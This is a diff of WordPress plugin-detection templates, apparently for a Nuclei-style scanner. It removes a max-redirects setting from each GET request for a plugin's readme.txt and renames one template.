@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/amp/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/astra-widgets/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/cloudflare/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt"


@ -1,7 +1,7 @@
id: wordpress-duplicator
info:
name: Duplicator WordPress Migration Plugin Detection
name: Duplicator WordPress Migration & Backup Plugin Detection
author: ricardomaia
severity: info
reference:
@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt"


@ -13,8 +13,7 @@ info:
requests:
- method: GET
redirects: true
max-redirects: 2
path:
- "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt"
